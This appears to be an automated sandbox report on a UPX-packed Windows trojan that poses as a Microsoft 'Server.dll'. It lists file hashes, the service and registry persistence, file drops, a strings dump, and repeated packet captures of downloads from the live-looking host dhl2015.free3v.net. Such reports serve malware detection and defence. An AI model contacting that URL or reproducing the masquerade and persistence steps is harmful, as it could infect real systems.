Analysis Date2015-05-27 08:07:36
MD521d6e1b94bdcbc8297605553b37797b3
SHA1abcdcb68aba468b4beb1042fea28157464fefa01

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: d08014963794a4dd7ef023d79bfe22d6 sha1: 8db04e1652a64bebceff275400566ecea5302735 size: 7680
Section.rsrc md5: eaf940a8d624ec62750cbdc6cb0cbb50 sha1: 11f6bc958ad0963b6a2f69cd535409815340a3d5 size: 1536
Timestamp2014-04-02 13:26:29
VersionLegalCopyright: Copyright ? 2009
InternalName: Microsoft(R) Windows(R) Operating System
FileVersion: 2, 0, 0, 0
CompanyName: Microsoft Corporation
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: Microsoft(R) Windows(R) Operating System
SpecialBuild:
ProductVersion: 2, 0, 0, 0
FileDescription: Microsoft Corporation
OriginalFilename: Server.dll
PackerUPX -> www.upx.sourceforge.net
PEhashf9d0ef13649f1b3cd56602ee7a756a09d7947ed1
IMPhash939782a3830d12b342b41dc0b9906cc1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wsmccs kemsgyyw\DeleteFiles ➝
C:\malware.exe\\x00
Creates FileC:\WINDOWS\Iwiyeoa.exe
Creates ProcessC:\WINDOWS\Iwiyeoa.exe
Creates ProcessC:\WINDOWS\Iwiyeoa.exe

Process
↳ C:\WINDOWS\Iwiyeoa.exe

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wsmccs kemsgyyw\ConnectGroup ➝
6\\xd4\\xc221\\xc8\\xd5\\x00
Creates ServiceSagmiy wwyyswqkyooawwysao - C:\WINDOWS\Iwiyeoa.exe

Process
↳ C:\WINDOWS\Iwiyeoa.exe

Creates Filepipe\net\NtControlPipe10
Creates FileC:\Program Files\AppPatch\NetSyst68.dll
Winsock URLhttp://dhl2015.free3v.net/NetSyst68.jpg

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1868

Process
↳ Pid 1160

Network Details:

DNSdhl2015.free3v.net
Type: A
1.1.1.1
DNSmomonophoto.com
Type: A
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)
Flows TCP192.168.1.1:1031 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1032 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1033 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1034 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1035 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1036 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1037 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1038 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1039 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1040 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1041 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1042 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1043 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1044 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1045 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1046 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1047 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1048 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1049 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1050 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1051 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1052 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1053 ➝ 1.1.1.1:80
Flows TCP192.168.1.1:1054 ➝ 1.1.1.1:80

Raw Pcap
0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .

0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .


Strings
@.@.
080404b0
2, 0, 0, 0
Comments
CompanyName
Copyright ? 2009
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
Microsoft Corporation
Microsoft(R) Windows(R) Operating System
OriginalFilename
PrivateBuild
ProductName
ProductVersion
Server.dll
SpecialBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
0+ ,(-c.of
0	|Wl8
1i2n=|
&2'/(4).*
>2s!4f5t6
??2@YAPAXI@Z
3:4beR7)n
4+,;0v
5162738495
:6;7<8=9>7
89ddsi#
8LX9vCz/J3Cs5g15/2;
91xKG'SizY
abBKCh
_:Addr>zadLibr
ADVAPI32.dll
\a-M./
DjroKC
eEDe!Q#C
Environo`o
ExitProcess
f?C@Ce
fefy18+7z35++/
f g!h"i
fHflLC6wMCw/7jCurDEpqa0
fPu8/3F8PDx8f28scTf
f,s-t.u/v0wf
FuUpgr
GetProcAddress
GetStartup
GIHJi+`Ns
HRfQ	L({
hzH-s9 DV"Cw
h;! Zz
i&'()+
InfoAModuleHand
InternetOpenA
i>#o$%'
i@#tLnB7vHn8u/m9&
"&+jdY
#j$k%l&m'n
KERNEL32.DLL
[kolfp
l1x2y3z40l6
L2ezD8
l6(o)p*q+r6
lGpkxVX
LoadLibraryA
Lq2pv+0tKamsLSuu
MSVCRT.dll
Nam9LocalAll
%O&F'T)A*RO
Op5SCM`agJAX
PCupGTi9+W
^PU:OT
,r5Ev->;
RegOpenKeyA
rymc%wt+Gs6euxMX/sLF
rzfZysPIRY3bmckKnVJoDfApC+[
Sd'`]q+
SHELL32.dll
ShellExecuteA
srfDsM79RMh
TadtU ~.
!This program cannot be run in DOS mode.
ue7@Sl
U_har39
u n!t"
USER32.dll
v6fz8w7e7
v9u$uq
vUnl-bP
w8/L19O
WININET.dll
w	P5`j
WriteFi
wsprintfA
yctG0x
ZhPU\W